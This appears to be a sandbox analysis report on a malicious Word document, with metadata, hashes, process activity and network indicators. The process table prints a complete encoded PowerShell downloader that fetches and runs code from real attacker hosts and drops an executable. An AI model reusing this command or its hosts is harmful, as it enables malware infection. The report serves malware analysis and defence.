File name: | malware.doc |
Full analysis: | https://app.any.run/tasks/7e186029-fc14-45a0-a271-9eb36d53960b |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 17:44:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Devolved client-server moratorium, Subject: New Hampshire Nathen, Author: 561.185.8603, Comments: Automated encompassing solution, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Mon Dec 17 08:36:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0 |
MD5: | A909314F1C50F695B7C461D1004DDE5A |
SHA1: | A8192244F20DDA4A68E708905FF9DD55AF96356A |
SHA256: | E4D34EDF631BCAEB1D83DA08DDBBC4BFD33A73C276F34E4A62B74950BF0F333C |
SSDEEP: | 1536:1ycKk/nlg/r6UKpLjtEueEy/Wg2SqRlDP3edCmAhHHF:9g/r8NGPEfa8hn |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 2 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 23552 |
Company: | Quitzon-Torphy Estella Kuhlman |
Manager: | Hailie Turner |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 2 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:12:17 08:36:00 |
CreateDate: | 2018:04:19 18:59:00 |
TotalEditTime: | 3.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 11 |
LastModifiedBy: | Пользователь Windows |
Template: | Normal |
Comments: | Automated encompassing solution |
Keywords: | - |
Author: | 561.185.8603 |
Subject: | New Hampshire Nathen |
Title: | Devolved client-server moratorium |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2716 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\malware.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3872 | powershell.exe -NoP -Exec Bypass -NoExit -EC JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoADQAKACAAIAAgACAAIAAgACAAJAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADMALgAxADQANQAvAHIAZQB6AC0AcwBlAG4AcQBvAC8AbwA0ADAAMgBlAGsAMgBtAC4AcABoAHAAIgA7AA0ACgAgACAAIAAgACAAIAAgAEkARQBYACgAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQApADsADQAKAAkADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAB9AA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwBmAG8AZQByAG0AbwB1AGQAYQBsAC4AYwBvAG0ALwByAGUAegAtAHMAZQBuAHEAbwAvAG8ANAAwADIAZQBrADIAbQAuAHAAaABwAD8AbAA9AGQAYQBsAG8AbgAzAC4AZABkAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABrAHAAYwBsAHgAeABzAC4AZQB4AGUAIgA7AA0ACgAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAcABhAHQAaAAsACAAJAByAGUAcwBwAG8AbgBzAGUAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAYwBsAHMAaQBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABHAHUAaQBkACAAJwBDADAAOABBAEYARAA5ADAALQBGADIAQQAxAC0AMQAxAEQAMQAtADgANAA1ADUALQAwADAAQQAwAEMAOQAxAEYAMwA4ADgAMAAnAA0ACgAgACAAIAAgACAAJAB0AHkAcABlACAAPQAgAFsAVAB5AHAAZQBdADoAOgBHAGUAdABUAHkAcABlAEYAcgBvAG0AQwBMAFMASQBEACgAJABjAGwAcwBpAGQAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQAIAA9ACAAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHQAeQBwAGUAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQALgBEAG8AYwB1AG0AZQBuAHQALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQAcABhAHQAaAAsACQAbgB1AGwALAAgACQAbgB1AGwALAAgACQAbgB1AGwALAAwACkADQAKAA0ACgAgACAAIAAgACAAfQBjAGEAdABjAGgAewB9AA0ACgAgACAAIAAgACAADQAKACAAIAB9AA0ACgB9AA0ACgANAAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8870.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\23LZ9943O5AYOUZJNSUM.temp | — | |
MD5:— | SHA256:— | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B313C273380B644EB92883C0F36F50 | SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001 | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$alware.doc | pgc | |
MD5:6A3A7AFE6D9189A99EF848C6617AC5EC | SHA256:0B84E41016B39A1A6DC8EF4A9D294DDF00268CF283BC137338F662A52875F02C | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199418.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3872 | powershell.exe | GET | — | 176.32.33.145:80 | http://176.32.33.145/rez-senqo/o402ek2m.php | RU | — | — | unknown |
3872 | powershell.exe | GET | — | 176.32.33.145:80 | http://176.32.33.145/rez-senqo/o402ek2m.php | RU | — | — | unknown |
3872 | powershell.exe | GET | — | 193.187.173.215:80 | http://foermoudal.com/rez-senqo/o402ek2m.php?l=dalon3.dds | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3872 | powershell.exe | 193.187.173.215:80 | foermoudal.com | — | — | suspicious |
3872 | powershell.exe | 176.32.33.145:80 | — | LLC Baxet | RU | unknown |
Domain | IP | Reputation |
---|---|---|
foermoudal.com |
| suspicious |